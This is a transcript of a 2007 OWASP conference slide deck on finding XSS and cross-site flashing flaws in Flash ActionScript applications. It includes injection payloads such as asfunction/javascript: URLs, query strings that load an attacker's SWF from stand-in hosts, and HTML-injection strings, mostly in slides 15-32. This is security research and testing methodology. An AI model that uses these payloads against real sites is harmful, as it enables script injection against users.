Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps

3,495
-1

Published on

Published in: Technology
1 Comment
1 Like
Statistics
Notes
No Downloads
Views
Total Views
3,495
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
1
Likes
1
Embeds 0
No embeds

No notes for slide

Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Apps

  1. 1. Finding Vulnerabilities in Flash Applications Stefano Di Paola CTO MindedSecurity [email_address] +393209495590
  2. 2. <ul><li>Stefano Di Paola: </li></ul><ul><ul><li>CTO & Co-Founder Minded Security </li></ul></ul><ul><ul><li>Security Engineer & Researcher </li></ul></ul><ul><ul><li>Web App Pen Tester </li></ul></ul><ul><ul><li>Code Review and Forensic </li></ul></ul><ul><ul><li>Vulnerabilities (PDF UXSS & Others) </li></ul></ul><ul><ul><li>OWASP Italy R&D Director </li></ul></ul>$ Whoami^J
  3. 3. Agenda <ul><li>Introduction </li></ul><ul><li>SWF Client Side Attacks </li></ul><ul><li>Finding Injection Entry Points </li></ul><ul><li>Potentially Dangerous Native Functions and Objects </li></ul><ul><li>Runtime Analysis </li></ul>
  4. 4. Agenda <ul><li>Introduction </li></ul><ul><li>SWF Client Side Attacks </li></ul><ul><li>Finding Injection Entry Points </li></ul><ul><li>Potentially Dangerous Native Functions and Objects </li></ul><ul><li>Runtime Analysis </li></ul>
  5. 5. Objectives <ul><li>Focus on Flash ActionScript 2 Applications Security </li></ul><ul><li>Understand the attack flow </li></ul><ul><li>Dead Code Analysis Methodology </li></ul><ul><li>Runtime Analysis Methodology </li></ul>
  6. 6. Flash Apps - Security Concerns <ul><li>Can execute JavaScript when embedded in a HTML page and viewed from inside a Browser. </li></ul><ul><li>Can forge binary requests and HTTP Requests. </li></ul><ul><li>Can execute external Flash Movies. </li></ul><ul><li>Can play Audio/Video files natively. </li></ul><ul><li>Can display minimal HTML code inside a TextField. </li></ul>
  7. 7. Agenda <ul><li>Introduction </li></ul><ul><li>SWF Client Side Attacks </li></ul><ul><li>Finding Injection Entry Points </li></ul><ul><li>Potentially Dangerous Native Functions and Objects </li></ul><ul><li>Runtime Analysis </li></ul>
  8. 8. SWF Client Side Attacks <ul><li>This new attack vector was presented @ OWASP 2007 Appsec Conference in Milan, Italy </li></ul><ul><li>Relies on flawed SWF files and not on SWF parser </li></ul><ul><li>A flawed SWF is a SWF which could allow </li></ul><ul><ul><li>classical XSS </li></ul></ul><ul><ul><li>Cross Site Flashing (the dark side of cross movie scripting) </li></ul></ul>
  9. 9. Cross Site Flashing (XSF) <ul><li>XSF occurs when from different domains: </li></ul><ul><ul><li>One Movie loads another Movie with loadMovie* functions or other hacks and has access to the same sandbox or part of it </li></ul></ul><ul><ul><li>XSF could also occurs when an HTML page uses *Script to script a Macromedia Flash movie, for example, by calling: </li></ul></ul><ul><ul><ul><li>GetVariable : access to flash public and static object from javascript as a string. </li></ul></ul></ul><ul><ul><ul><li>SetVariable : set a static or public flash object to a new string value from javascript. </li></ul></ul></ul><ul><ul><li>Unexpected Browser to SWF communication could result in stealing data from SWF application </li></ul></ul>
  10. 10. Accomplishing an Attack using flawed SWF <ul><li>When a link to a flawed SWF is directly pasted to the location bar every browser automatically generates some HTML with Object and/or Embed tags : </li></ul><html> <body marginwidth=&quot;0&quot; marginheight=&quot;0&quot;> <embed width=&quot;100%&quot; height=&quot;100%&quot; name=&quot;plugin&quot; src=&quot;http://Url/To/Swf&quot; type=&quot;application/x-shockwave-flash&quot;/> </body> </html>
  11. 11. Attack Example to a Flawed SWF <ul><li>A flawed SWF was uploaded to vi.ct.im Host. </li></ul><ul><li>Contains the following code </li></ul><ul><li>Let's see what an attacker could do with a browser ( Video ) </li></ul>v1.loadv = function () { this.varTarget = new MovieClip(); _root.createEmptyMovieClip('varTarget', 10); var v2 = new XML(); v2.load( _root.test ); };
  12. 12. Accomplish an attack <ul><li>So clicking and redirecting to a SWF will let the browser execute it on the main window. </li></ul><ul><ul><li>Works with every browser. </li></ul></ul><ul><ul><li>IE7 needs: </li></ul></ul><ul><li>Iframe 'src' could be used too. </li></ul><ul><ul><li>Tested on Firefox </li></ul></ul><ul><ul><li>SWF/Browser interaction doesn't work in IE7 using javascript: . </li></ul></ul><ul><ul><li>We'll see when it works even with IE7 </li></ul></ul><ul><ul><ul><li>try{ code }catch(e){location.reload()} </li></ul></ul></ul>
  13. 13. The Attack Flow We will see the dangerous mechanisms that could lead to Client Side Attacks <ul><ul><li>URL QueryString </li></ul></ul><ul><ul><li>Global Uninitialized Variables </li></ul></ul><ul><ul><li>flashVars </li></ul></ul><ul><ul><li>External Movies </li></ul></ul><ul><ul><li>Remote XML files </li></ul></ul><ul><ul><li>MP3 and Flv Movies </li></ul></ul><ul><ul><li>Embedded HTML </li></ul></ul>
  14. 14. Agenda <ul><li>Introduction </li></ul><ul><li>SWF Client Side Attacks </li></ul><ul><li>Finding Injection Entry Points </li></ul><ul><li>Potentially Dangerous Native Functions and Objects </li></ul><ul><li>Runtime Analysis </li></ul>
  15. 15. Register Globals in ActionScript <ul><li>Similar to PHP Register Globals </li></ul><ul><li>Every uninitialized variable with global scope is a potential threat: </li></ul><ul><ul><li>_root.* </li></ul></ul><ul><ul><li>_global.* </li></ul></ul><ul><ul><li>_level0.* </li></ul></ul><ul><ul><li>.* </li></ul></ul><ul><li>It is easy to add it as a parameter in the query string: </li></ul><ul><li>http://URL ?language=http://evil </li></ul>if (_root.language != undefined) { Locale.DEFAULT_LANG = _root.language; } v5.load(Locale.DEFAULT_LANG + '/player_' + Locale.DEFAULT_LANG + '.xml');
  16. 16. Register Globals in Included Files 1/2 <ul><li>Assumptions made for _level n movies are wrong when a movie supposed to be at level1 is loaded as _level0 </li></ul><ul><li>_level( n-1 ).* </li></ul>/* Level0 Movie */ _level0.DEMO_PATH = getHost(this._url); loadMovieNum(_level0.DEMO_PATH + _level0.PATH_DELIMITER + 'upperlev.swf', (_level0.demo_level + 1)); .... /* Level1 Movie ' upperlev.swf ' */ .... loadMovieNum( _level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......
  17. 17. Register Globals in Included Files 2/2 <ul><li>Then let's load upperlev.swf and then use query string to initialize DEMO_PATH: </li></ul><ul><ul><li>http://host/upperlev.swf ?DEMO_PATH=http://evil </li></ul></ul>/* Level1 Movie ' upperlev.swf ' */ .... loadMovieNum( _level0.DEMO_PATH + _level0.PATH_DELIMITER + 'debugger.swf', (_level0.control_level + 1)); ......
  18. 18. Agenda <ul><li>Introduction </li></ul><ul><li>SWF Client Side Attacks </li></ul><ul><li>Finding Injection Entry Points </li></ul><ul><li>Potentially Dangerous Native Functions and Objects </li></ul><ul><li>Runtime Analysis </li></ul><ul><li>Static Analysis </li></ul>
  19. 19. Attack Patterns – Quick Reference <ul><li>Some Attack patterns were already described in: </li></ul><ul><ul><li>Testing Flash Applications </li></ul></ul><ul><ul><ul><li>http://www.wisec.it/docs.php?id=5 </li></ul></ul></ul><ul><li>A quick reference of attack patterns which trigger XSS in SWF: </li></ul><ul><ul><li>asfunction :getURL,javascript:alert('XSS') </li></ul></ul><ul><ul><li>javascript:alert('XSS') </li></ul></ul><ul><ul><li><img src='javascript:alert(“XSS”)//.jpg'> </li></ul></ul><ul><ul><li>http://evil.ltd/evilversion7.swf </li></ul></ul>
  20. 20. Attack Patterns – Quick Reference <ul><li>A quick reference of PDNF and Objects where attack pattern could be injected: </li></ul><ul><ul><li>getURL </li></ul></ul><ul><ul><li>load*(URL,..) Functions </li></ul></ul><ul><ul><ul><li>loadVariables(url, level ) </li></ul></ul></ul><ul><ul><ul><li>LoadMovie ( url, target ) </li></ul></ul></ul><ul><ul><ul><li>LoadMovieNum( url, level ) </li></ul></ul></ul><ul><ul><ul><li>XML.load ( url ) </li></ul></ul></ul><ul><ul><ul><li>LoadVars.load ( url ) </li></ul></ul></ul><ul><ul><ul><li>Sound.loadSound( url , isStreaming ); </li></ul></ul></ul><ul><ul><ul><li>NetStream.play( url ); </li></ul></ul></ul><ul><ul><li>TextField.htmlText </li></ul></ul>
  21. 21. Attack Patterns – GetURL New Issue <ul><li>The GET issue^N^N^N^N^Nfeature : </li></ul><ul><ul><li>From Adobe : </li></ul></ul><ul><ul><ul><li>“ ..The GET method appends the variables to the end of the URL, and is used for small numbers of variables..” </li></ul></ul></ul><ul><ul><li>if a SWF contains the above, a request like </li></ul></ul><ul><ul><li>becomes: </li></ul></ul><ul><ul><li>Credits go to SirDarckCat and Kuza55 who found it </li></ul></ul>getURL('javascript:SomeFunc( “ someValue ” )','','GET') <ul><ul><ul><li>http://victim/noundef.swf?a=0:0;alert('XSS') </li></ul></ul></ul><ul><ul><li>javascript:SomeFunc(“someValue”) ?a=0:0;alert(123) </li></ul></ul>
  22. 22. Attack Patterns – ExternalInterface New Issue <ul><li>flash.external.ExternalInterface.call syntax </li></ul><ul><li>Actually, methodName could be any Javascript code. In fact, when call(' method123 ') is executed, a javascript function is called ( www.develotec.com/flash8api.txt ) : </li></ul>public static call(methodName:String, [parameter1:Object]) <ul><ul><li>try { __flash__toXML( method123 ()) ; } catch (e) { &quot;<undefined/>&quot;; } </li></ul></ul>
  23. 23. External Interface Attack <ul><li>What happens if a SWF contains: </li></ul><ul><li>http://host/swf?callback= (new Function(“alert(‘Xss’)”)) </li></ul><ul><li>Works with Iframe and IE7 too </li></ul>flash.external.ExternalInterface.call( _root.callback ) __flash__toXML( (new Function( “ alert( ‘ Xss ’ ) ” )) ())
  24. 24. Attack Patterns – Font New Issue <ul><li>Some code like </li></ul><ul><li>Rewrites ‘something’ to </li></ul><ul><ul><li><p font=“TIMES”>something</p> </li></ul></ul><ul><li>That could be exploited by injecting : </li></ul><ul><ul><ul><li>fontFamily = ' ”><img src=”http://evil/evil.swf”><” ' </li></ul></ul></ul><ul><ul><li>createTextField(&quot;txt&quot;, 999, 10, 10, 320, 240); </li></ul></ul><ul><ul><li>txt.html=true; </li></ul></ul><ul><ul><li>var _tf:TextFormat = new TextFormat(); </li></ul></ul><ul><ul><li>_tf.font = _root.fontFamily ; </li></ul></ul><ul><ul><li>txt.setTextFormat( _tf ); </li></ul></ul><ul><ul><li>txt.htmlText='something'; </li></ul></ul>
  25. 25. Modify the Data Flow 1/4 <ul><li>Multiple classes and packages are often used to separate functionality. </li></ul><ul><li>In Flash, every class/package like </li></ul><ul><li>is compiled in the following way: </li></ul><ul><ul><ul><li>push 'simpleClass' </li></ul></ul></ul><ul><ul><ul><li>getVariable </li></ul></ul></ul><ul><ul><ul><li>not </li></ul></ul></ul><ul><ul><ul><li>not </li></ul></ul></ul><ul><ul><ul><li>branchIfTrue label1 </li></ul></ul></ul><ul><ul><ul><li>... </li></ul></ul></ul><ul><ul><ul><li>label1 </li></ul></ul></ul><ul><ul><ul><li>end </li></ul></ul></ul><ul><ul><ul><li>class simpleClass{} </li></ul></ul></ul>
  26. 26. Modify the Data Flow 2/4 <ul><li>Decompiled by flare, results in: </li></ul><ul><li>So simpleClass is a _global attribute. </li></ul><ul><li>This means that it's initially undefined. </li></ul><ul><li>So it can be instantiated with a string value from the query string </li></ul><ul><ul><li>if (!simpleClass) { </li></ul></ul><ul><ul><li>_global.simpleClass = function () {}; ... } </li></ul></ul>
  27. 27. Modify the Data Flow 3/4 <ul><li>Suppose there is a class like: </li></ul><ul><ul><ul><ul><ul><li>class simpleUtils { </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>static public function testForSomething(){ </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li> if(ok) return true; </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li> else return false; </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>} ... </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>class simpleClass { </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>static function main(){ </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>if(!simpleUtils.testForSomething()) getURL('javascript:alert(&quot;Sorry!&quot;)'); </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>else getURL('javascript:alert(&quot;ok!&quot;)'); </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><ul><li>} ... </li></ul></ul></ul></ul></ul>
  28. 28. Modify the Data Flow 4/4 <ul><li>Sending the request: </li></ul><ul><ul><ul><ul><ul><li>http://host/swf.swf? simpleUtils =blah </li></ul></ul></ul></ul></ul><ul><li>sets the object simpleUtils to an instantiated string, so: </li></ul><ul><ul><ul><ul><ul><li>simpleUtils.testForSomething() </li></ul></ul></ul></ul></ul><ul><ul><ul><ul><li>becomes undefined and the flow is modified. </li></ul></ul></ul></ul><ul><ul><ul><li>if(!simpleUtils.testForSomething()) </li></ul></ul></ul><ul><ul><ul><li>getURL('javascript:alert(&quot;Sorry!&quot;)'); </li></ul></ul></ul><ul><ul><ul><li>else </li></ul></ul></ul><ul><ul><ul><li>getURL('javascript:alert(&quot;ok!&quot;)'); </li></ul></ul></ul>
  29. 29. Agenda <ul><li>Introduction </li></ul><ul><li>SWF Client Side Attacks </li></ul><ul><li>Finding Injection Entry Points </li></ul><ul><li>Potentially Dangerous Native Functions and Objects </li></ul><ul><li>Runtime Analysis </li></ul>
  30. 30. Recipe for Runtime Analysis <ul><li>A method to find uninitialized variables </li></ul><ul><li>A SWF Container which loads the external one </li></ul><ul><li>One array of attack patterns </li></ul><ul><li>A framework to mix our ingredients </li></ul>
  31. 31. Find Undefined Vars @ Runtime <ul><li>Definition of __resolve : </li></ul><ul><ul><li>from Adobe: </li></ul></ul><ul><li>“ a reference to a user-defined function that is invoked if ActionScript code refers to an undefined property or method . If ActionScript code refers to an undefined property or method of an object, Flash Player determines whether the object's __resolve property is defined.” </li></ul><ul><li>As we need to find _root.* or _global.* undefined variables: </li></ul>_ root.__resolve = function (name){ // name is undefined }
  32. 32. Attack Patterns Array <ul><li>From our knowledge base, an attack Array will contain the following elements: </li></ul><ul><ul><li>Direct load asfunction: </li></ul></ul><ul><ul><ul><li>getURL,javascript:gotRoot(&quot;&quot;)///d.jpg </li></ul></ul></ul><ul><ul><li>Controlled Evil Page/Host: </li></ul></ul><ul><ul><ul><li>http://at.tack.er/evil.swf </li></ul></ul></ul><ul><ul><li>Flash Html Injection: </li></ul></ul><ul><ul><ul><li>“ '><img src='asfunction:getURL,javascript:gotRoot(“”)//.jpg' > </li></ul></ul></ul><ul><ul><li>Dom Injection: </li></ul></ul><ul><ul><ul><li>(gotRoot('')) </li></ul></ul></ul><ul><ul><li>Js/Flash Error: </li></ul></ul><ul><ul><ul><li>“ '|!$%&/)= </li></ul></ul></ul>
  33. 33. A SWF Container <ul><li>The SWF to be analyzed is closed, so we need a wrapper which shares _root and _global variables </li></ul><ul><li>The wrapper will contain __resolve methods for _root and _globals. </li></ul><ul><ul><ul><li>var image_mcl = new MovieClipLoader(); </li></ul></ul></ul><ul><ul><ul><li>image_mcl.addListener(mclListener); </li></ul></ul></ul><ul><ul><ul><li>_root._lockroot=true </li></ul></ul></ul><ul><ul><ul><li>image_mcl.loadClip( _root.swfurl+&quot;?&quot;+ _root.varToSend, _root.varTarget); </li></ul></ul></ul>
  34. 34. A framework: SWFRTAnalyzer
  35. 35. Conclusions <ul><li>A free version of the SWF Runtime Analyser will be released by Minded Security. </li></ul><ul><li>Awareness about ActionScript security is growing but is still a drop in the ocean. </li></ul><ul><li>There is still a lot of research to do about Actionscript security. </li></ul>
  36. 36. Thank you :) Questions? <ul><li>Web: http://www.mindedsecurity.com </li></ul><ul><li>Weblog: http://www.wisec.it </li></ul><ul><li>Email: stefano.dipaola_at_mindedsecurity.com </li></ul>

×